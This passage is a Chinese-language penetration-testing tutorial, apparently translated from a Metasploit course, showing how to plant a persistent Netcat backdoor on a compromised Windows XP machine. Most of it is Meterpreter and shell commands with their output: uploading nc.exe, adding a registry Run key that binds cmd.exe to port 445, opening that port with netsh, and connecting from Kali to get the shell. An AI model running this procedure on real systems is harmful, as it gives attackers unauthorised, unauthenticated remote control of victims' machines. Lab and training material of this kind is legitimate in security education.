在这个例子中,我们不是在远程系统上查询信息,而是安装一个Netcat后门程序。这包括对系统注册表和防火墙的更改。
首先,我们必须将Netcat的副本上传到远程系统。
meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
[*] uploading : /usr/share/windows-binaries/nc.exe -> C:\windows\system32
[*] uploaded : /usr/share/windows-binaries/nc.exe -> C:\windows\system32nc.exe
之后,我们使用注册表让netcat在启动时执行并在端口445上侦听。我们通过编辑键”HKLM\software\microsoft\windows\currentversion\run“来完成此操作。
meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run
Values (3):
VMware Tools
VMware User Process
quicktftpserver
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe'
Successful set nc.
meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
Key: HKLM\software\microsoft\windows\currentversion\Run
Name: nc
Type: REG_SZ
Data: C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe
接下来,我们需要修改系统以允许通过防火墙的远程连接到我们的Netcat后门。我们打开一个交互式命令提示符并使用'netsh'命令进行更改,因为它比直接更改注册表要少得多。此外,所显示的流程应该可以在更多版本的Windows上运行,因为注册表位置和功能是高度版本和与修补程序级别相关的。
meterpreter > execute -f cmd -i
Process 1604 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Jim\My Documents > netsh firewall show opmode
Netsh firewall show opmode
Domain profile configuration:
-------------------------------------------------------------------
Operational mode = Enable
Exception mode = Enable
Standard profile configuration (current):
-------------------------------------------------------------------
Operational mode = Enable
Exception mode = Enable
Local Area Connection firewall configuration:
-------------------------------------------------------------------
Operational mode = Enable
我们在防火墙中打开端口445并仔细检查设置是否正确。
C:\Documents and Settings\Jim\My Documents > netsh firewall add portopening TCP 445 "Service Firewall" ENABLE ALL
netsh firewall add portopening TCP 445 "Service Firewall" ENABLE ALL
Ok.
C:\Documents and Settings\Jim\My Documents > netsh firewall show portopening
netsh firewall show portopening
Port configuration for Domain profile:
Port Protocol Mode Name
-------------------------------------------------------------------
139 TCP Enable NetBIOS Session Service
445 TCP Enable SMB over TCP
137 UDP Enable NetBIOS Name Service
138 UDP Enable NetBIOS Datagram Service
Port configuration for Standard profile:
Port Protocol Mode Name
-------------------------------------------------------------------
445 TCP Enable Service Firewall
139 TCP Enable NetBIOS Session Service
445 TCP Enable SMB over TCP
137 UDP Enable NetBIOS Name Service
138 UDP Enable NetBIOS Datagram Service
C:\Documents and Settings\Jim\My Documents >
因此,在完成之后,我们将重新启动远程系统并测试Netcat shell。
root@kali:~# nc -v 172.16.104.128 445
172.16.104.128: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [172.16.104.128] 445 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Jim > dir
dir
Volume in drive C has no label.
Volume Serial Number is E423-E726
Directory of C:\Documents and Settings\Jim
05/03/2017 01:43 AM
.
05/03/2017 01:43 AM
..
05/03/2017 01:26 AM 0 ;i
05/12/2017 10:53 PM
Desktop
10/29/2016 05:55 PM
Favorites
05/12/2017 10:53 PM
My Documents
05/03/2017 01:43 AM 0 QCY
10/29/20016 03:51 AM
Start Menu
05/03/2017 01:25 AM 0 talltelnet.log
05/03/2017 01:25 AM 0 talltftp.log
4 File(s) 0 bytes
6 Dir(s) 35,540,791,296 bytes free
C:\Documents and Settings\Jim >
真是精彩!在真实世界的情况下,我们不会使用如此简单的后门,因为没有身份验证或加密,但是对于系统的其他更改以及其他可能需要执行的程序,此过程的原理保持不变在启动。